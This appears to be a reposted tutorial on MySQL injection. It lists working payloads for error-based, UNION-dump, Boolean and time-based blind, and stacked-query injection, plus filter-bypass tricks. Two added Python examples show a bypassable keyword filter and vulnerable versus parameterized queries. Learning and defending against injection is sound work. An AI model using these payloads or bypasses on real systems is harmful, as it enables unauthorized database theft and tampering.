MySQL injection basics and Bypass Tips summary

Source: Internet
Author: User
Tags: mysql, injection

1. The principle of MySQL injection: user-supplied input is spliced into a SQL statement and executed as part of it.

2. Practical experience with MySQL injection: first test the parameter, then test the injection type, then test bypasses.

First, test the parameter: for any injectable parameter you must determine its type (numeric or string). "Type" here means the type of the injection point, i.e. whether the value sits bare in the query or inside quotes (***).

Commonly used probe characters: quotes (single and double), parentheses, and combinations of quotes and parentheses ...

Second, test the injection type. There are five major categories (mnemonic: Beust): Boolean-based blind, error-based, UNION query, time-based blind, and stacked queries.

Boolean-based blind: and 1=1, and 1=2, or 1=1, or 1=2 ...

Error-based injection (each payload makes MySQL raise an error whose message carries the result; 0x7e is '~', a marker that keeps the result visible inside the error text, and the XPath errors from updatexml/extractvalue show at most 32 characters, so long values must be read with substr()):

floor: and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

updatexml: and 1=updatexml(1,concat(0x7e,(select database())),1)

extractvalue: and 1=extractvalue(1,concat(0x7e,(select database())))

......

UNION query injection:

order by n // determine the number of columns; n is a positive integer

union select ... // find which columns are echoed on the page; try to make the query before the union return no rows so that the union's row is what gets displayed

Dump the databases, tables, columns and values. Taking the case where the second column is echoed, the common statements are as follows:

union select 1,group_concat(schema_name),3 from information_schema.schemata // dump database names

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() // dump table names

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='table name' // dump column names

union select 1,group_concat(field1,0x3a,field2),3 from table_name // dump values; 0x3a is ':' and separates the two fields so we can read them apart

Time-based blind injection: judged by the page's response delay. Test payload: and sleep(5)

Injection method (guessing character by character):

and if(length(database())>5,sleep(5),0) // guess the length of the database name

and if(ord(database())>100,sleep(5),0) // guess the first character of the database name (ord() reads the leftmost character; use ord(mid(database(),i,1)) for the i-th)

...... It is better to use sqlmap here.

Stacked query injection: executes several SQL statements in one request, separated by semicolons, so it can also run INSERT, DELETE and UPDATE statements. It only works when the application's database API allows multiple statements in one call (for example PHP's mysqli_multi_query); the usual single-statement APIs refuse the second statement.

Third, try bypasses: this is mostly a matter of persistent trial and error; briefly, a few:

Bypassing space filtering: +, /**/, multiple spaces, newline (%0a), %a0, the wide byte (%df), parentheses

Bypassing union, select and other keywords: mixed case, double writing (uniounionn, unionunion, for filters that delete the keyword once), inline comments (/*!union*/), encoding

Bypassing and, or: &&, ||, %26%26, mixed case, double writing (anandd, andand), encoding
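To see why the double-write and comment tricks work, here is the kind of deny-list filter they are aimed at, as an added example that is not code from the original post. `naive_filter` strips keywords and spaces in a single pass; `fixpoint_filter` is the obvious "fix" (strip until nothing changes), which closes the double-write hole but shows the collateral damage of deleting substrings from ordinary input. All inputs are constructed test strings.

```python
"""One-pass keyword stripping and the bypasses it invites (added example)."""
import re

KEYWORDS = ("union", "select", "and", "or")


def strip_keywords(value: str) -> str:
    """Delete each keyword case-insensitively, scanning left to right once
    (what re.sub does); the result is never rescanned."""
    for word in KEYWORDS:
        value = re.sub(re.escape(word), "", value, flags=re.IGNORECASE)
    return value


def naive_filter(value: str) -> str:
    """The deny-list filter under attack: strip keywords once, then spaces."""
    return strip_keywords(value).replace(" ", "")


def fixpoint_filter(value: str) -> str:
    """Strip keywords repeatedly until the string stops changing."""
    while True:
        stripped = strip_keywords(value)
        if stripped == value:
            return value
        value = stripped


if __name__ == "__main__":
    payload = "1/**/uniounionn/**/selselectect/**/1,2,3"
    print(naive_filter(payload))           # 1/**/union/**/select/**/1,2,3
    print(naive_filter("1/**/anandd/**/1=1"))  # 1/**/and/**/1=1
    print(fixpoint_filter(payload))        # 1/**//**//**/1,2,3
    print(fixpoint_filter("Anderson's password"))  # erson's passwd
```

MySQL accepts /**/ wherever whitespace is allowed, so the first output is a working union query: stripping "union" once out of "uniounionn" leaves exactly "union". The fixpoint version blocks the double write, but the last output shows why substring stripping is not a defence in its own right: it mangles legitimate input such as a surname, and it still has no way of knowing what the parser will see after URL decoding, comment removal and case folding. The parameterized queries recommended in section 3 avoid the problem entirely.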

......    

3. Defending against MySQL injection: strictly filter user input with allow-lists and deny-lists; use parameterized queries (prepared statements), which are the only reliable fix because the input is never parsed as SQL; deploy a SQL injection protection device (WAF) as an additional layer.
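The difference between concatenation and a parameterized query, as an added example rather than code from the original post. It uses Python's built-in sqlite3 in memory so it runs offline; the principle is identical for MySQL, where mysql-connector and PyMySQL take `%s` placeholders instead of sqlite3's `?`. Both injection-point types from section 2 are shown: a numeric one (id=...) where `1 or 1=1` needs no quote, and a string one (name='...') where the Boolean-blind probes `' and 1=1 -- ` / `' and 1=2 -- ` give different answers. The table and rows are constructed test data.

```python
"""Concatenation versus parameterised queries (added example)."""
import sqlite3


def setup() -> sqlite3.Connection:
    """Constructed test database: two users in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(id integer primary key, name text, pw text)")
    conn.executemany("insert into users(name, pw) values (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


# Numeric injection point: the value is spliced in without quotes.
def user_by_id_vulnerable(conn, user_id: str) -> list:
    sql = f"select name from users where id={user_id}"
    return [row[0] for row in conn.execute(sql)]


def user_by_id_safe(conn, user_id) -> list:
    # The driver sends the value separately; it is never parsed as SQL.
    sql = "select name from users where id=?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


# String injection point: the value is spliced in between single quotes.
def login_vulnerable(conn, name: str, pw: str) -> bool:
    sql = f"select id from users where name='{name}' and pw='{pw}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, name: str, pw: str) -> bool:
    sql = "select id from users where name=? and pw=?"
    return conn.execute(sql, (name, pw)).fetchone() is not None


if __name__ == "__main__":
    db = setup()
    print(user_by_id_vulnerable(db, "1 or 1=1"))       # ['alice', 'bob']
    print(user_by_id_safe(db, "1 or 1=1"))             # []
    print(login_vulnerable(db, "alice' and 1=1 -- ", ""))  # True  (Boolean blind: true branch)
    print(login_vulnerable(db, "alice' and 1=2 -- ", ""))  # False (Boolean blind: false branch)
    print(login_safe(db, "alice' and 1=1 -- ", ""))    # False
```

Note that the safe numeric lookup with `"1 or 1=1"` returns nothing rather than raising: the whole string is compared to the id column as a single value, which is exactly the behaviour parameterization guarantees.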
